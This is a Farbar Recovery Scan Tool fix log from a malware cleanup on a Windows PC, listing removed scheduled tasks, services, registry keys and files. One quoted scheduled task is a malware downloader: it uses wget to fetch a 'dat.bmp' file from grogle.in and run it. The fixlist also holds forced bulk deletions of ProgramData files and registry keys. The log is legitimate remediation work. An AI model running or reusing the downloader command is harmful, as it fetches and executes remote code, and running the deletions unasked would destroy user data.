Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 04-02-2015 01
Ran by Proteus at 2015-02-05 19:43:02 Run:1
Running from C:\Users\Proteus\Desktop\FRST
Loaded Profiles: Proteus & UpdatusUser (Available profiles: Proteus & UpdatusUser & DefaultAppPool)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
CloseProcesses:
CreateRestorePoint:
Task: {2B0FCD48-6531-4E36-89FA-214F118F1445} - System32\Tasks\{F11B7F52-71B1-40A5-B2D0-7E2A96AD8C9E} => pcalua.exe -a C:\Users\Proteus\Downloads\Huawei_Drivers_v4.25.11.00\Driver\DriverSetup.exe -d C:\Users\Proteus\Downloads\Huawei_Drivers_v4.25.11.00\Driver
Task: {8C97B981-9056-421B-A12D-7C43087905C6} - System32\Tasks\{07CD315F-8D34-4281-AC9E-4CEFE4534D41} => pcalua.exe -a "C:\Program Files (x86)\PLAY ONLINE\uninst.exe"
Task: {8F39E590-088F-4A09-95CC-41AD1FDCBEC1} - System32\Tasks\{61BD271E-EF2E-4AC1-8FD9-3097ABF7B4DA} => pcalua.exe -a "C:\Program Files\AVAST Software\Avast\aswRunDll.exe" -c "C:\Program Files\AVAST Software\Avast\Setup\setiface.dll" RunSetup
Task: {BA832787-7A2E-46E3-8854-CB91F631F134} - System32\Tasks\SYSTEM => cmd.exe /R cd "C:\ProgramData" & ping 1.1.1.1 -n 300 -w 1000 & wget -t 0 --retry-connrefused -O dat.bmp http://grogle.in/dat.bmp?data=embX3iyw8R;camtasia.exe;1422474927 & start cmd /R dat.bmp <==== ATTENTION
Task: {C99679AE-306B-4F01-927D-DA1BFF564E10} - System32\Tasks\{2C909A96-50CC-46F5-AA7E-7AD6831ED2EC} => pcalua.exe -a C:\ProgramData\LGMOBILEAX\LGMLauncher.exe -d C:\ProgramData\LGMOBILEAX
CustomCLSID: HKU\S-1-5-21-2603393732-3475753062-4034012456-1000_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}\InprocServer32 -> C:\Users\Proteus\AppData\Local\Google\Update\1.3.25.11\psuser_64.dll No File
HKU\S-1-5-21-2603393732-3475753062-4034012456-1000\...\Run: [Akamai NetSession Interface] => "C:\Users\Proteus\AppData\Local\Akamai\netsession_win.exe"
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => No File
HKU\S-1-5-21-2603393732-3475753062-4034012456-1000\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie
HKU\S-1-5-21-2603393732-3475753062-4034012456-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com/ie
SearchScopes: HKU\S-1-5-21-2603393732-3475753062-4034012456-1000 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = http://www.google.com/search?q={sear
SearchScopes: HKU\S-1-5-21-2603393732-3475753062-4034012456-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
FF HKU\S-1-5-21-2603393732-3475753062-4034012456-1000\...\Firefox\Extensions: [{B64D9B05-48E1-4CEB-BF58-E0643994E900}] - C:\Program Files (x86)\Common Files\DVDVideoSoft\plugins\ff
CHR DefaultSuggestURL: Default -> http://ssmsp.ask.com/query?sstype=prefix&li=ff&q={searchTerms}
S3 cpuz130; \??\C:\Users\Proteus\AppData\Local\Temp\cpuz130\cpuz_x64.sys [X]
S3 cpuz137; \??\C:\Windows\TEMP\cpuz137\cpuz137_x64.sys [X]
S3 ew_hwusbdev; system32\DRIVERS\ew_hwusbdev.sys [X]
S3 ew_usbenumfilter; system32\DRIVERS\ew_usbenumfilter.sys [X]
S3 GPUZ; \??\C:\Windows\TEMP\GPUZ.sys [X]
S3 huawei_cdcacm; system32\DRIVERS\ew_jucdcacm.sys [X]
S3 huawei_enumerator; system32\DRIVERS\ew_jubusenum.sys [X]
S3 huawei_ext_ctrl; system32\DRIVERS\ew_juextctrl.sys [X]
S3 huawei_wwanecm; system32\DRIVERS\ew_juwwanecm.sys [X]
S3 hwdatacard; system32\DRIVERS\ewusbmdm.sys [X]
C:\Program Files (x86)\GUT73DA.tmp
C:\ProgramData\TEMP
C:\Users\Proteus\Downloads\M-Kernel_*.zip
C:\Users\Proteus\Downloads\sh-remover.exe
CMD: del /q C:\ProgramData\*.*
Reg: reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f
Reg: reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f
Reg: reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f
Reg: reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f
EmptyTemp:
*****************

Processes closed successfully.
Error: (0) Failed to create a restore point.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2B0FCD48-6531-4E36-89FA-214F118F1445}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2B0FCD48-6531-4E36-89FA-214F118F1445}" => Key deleted successfully.
C:\Windows\System32\Tasks\{F11B7F52-71B1-40A5-B2D0-7E2A96AD8C9E} => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{F11B7F52-71B1-40A5-B2D0-7E2A96AD8C9E}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8C97B981-9056-421B-A12D-7C43087905C6}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8C97B981-9056-421B-A12D-7C43087905C6}" => Key deleted successfully.
C:\Windows\System32\Tasks\{07CD315F-8D34-4281-AC9E-4CEFE4534D41} => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{07CD315F-8D34-4281-AC9E-4CEFE4534D41}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8F39E590-088F-4A09-95CC-41AD1FDCBEC1}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8F39E590-088F-4A09-95CC-41AD1FDCBEC1}" => Key deleted successfully.
C:\Windows\System32\Tasks\{61BD271E-EF2E-4AC1-8FD9-3097ABF7B4DA} => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{61BD271E-EF2E-4AC1-8FD9-3097ABF7B4DA}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{BA832787-7A2E-46E3-8854-CB91F631F134}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BA832787-7A2E-46E3-8854-CB91F631F134}" => Key deleted successfully.
C:\Windows\System32\Tasks\SYSTEM => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SYSTEM" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C99679AE-306B-4F01-927D-DA1BFF564E10}" => Key deleted successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C99679AE-306B-4F01-927D-DA1BFF564E10}" => Key deleted successfully.
C:\Windows\System32\Tasks\{2C909A96-50CC-46F5-AA7E-7AD6831ED2EC} => Moved successfully.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{2C909A96-50CC-46F5-AA7E-7AD6831ED2EC}" => Key deleted successfully.
"HKU\S-1-5-21-2603393732-3475753062-4034012456-1000_Classes\CLSID\{D0336C0B-7919-4C04-8CCE-2EBAE2ECE8C9}" => Key deleted successfully.
HKU\S-1-5-21-2603393732-3475753062-4034012456-1000\Software\Microsoft\Windows\CurrentVersion\Run\\Akamai NetSession Interface => value deleted successfully.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00avast" => Key deleted successfully.
HKCR\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => Key not found.
HKU\S-1-5-21-2603393732-3475753062-4034012456-1000\Software\Microsoft\Internet Explorer\Main\\Search Bar => value deleted successfully.
HKU\S-1-5-21-2603393732-3475753062-4034012456-1000\Software\Microsoft\Internet Explorer\Main\\Default_Search_URL => Value was restored successfully.
"HKU\S-1-5-21-2603393732-3475753062-4034012456-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}" => Key deleted successfully.
HKCR\CLSID\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => Key not found.
HKU\S-1-5-21-2603393732-3475753062-4034012456-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Value not found.
HKU\S-1-5-21-2603393732-3475753062-4034012456-1000\Software\Mozilla\Firefox\Extensions\\{B64D9B05-48E1-4CEB-BF58-E0643994E900} => value deleted successfully.
Chrome DefaultSuggestURL not detected.
cpuz130 => Service deleted successfully.
cpuz137 => Service deleted successfully.
ew_hwusbdev => Service deleted successfully.
ew_usbenumfilter => Service deleted successfully.
GPUZ => Service deleted successfully.
huawei_cdcacm => Service deleted successfully.
huawei_enumerator => Service deleted successfully.
huawei_ext_ctrl => Service deleted successfully.
huawei_wwanecm => Service deleted successfully.
hwdatacard => Service deleted successfully.
C:\Program Files (x86)\GUT73DA.tmp => Moved successfully.
C:\ProgramData\TEMP => Moved successfully.
C:\Users\Proteus\Downloads\M-Kernel_*.zip => Moved successfully.
C:\Users\Proteus\Downloads\sh-remover.exe => Moved successfully.

========= del /q C:\ProgramData\*.* =========

========= End of CMD: =========

========= reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\mountpoints2 /f =========
Operacja ukończona pomyślnie.
========= End of Reg: =========

========= reg delete "HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes" /f =========
Operacja ukończona pomyślnie.
========= End of Reg: =========

========= reg delete "HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes" /f =========
Operacja ukończona pomyślnie.
========= End of Reg: =========

========= reg delete "HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes" /f =========
Operacja ukończona pomyślnie.
========= End of Reg: =========

EmptyTemp: => Removed 1.1 GB temporary data.

The system needed a reboot.

==== End of Fixlog 19:43:24 ====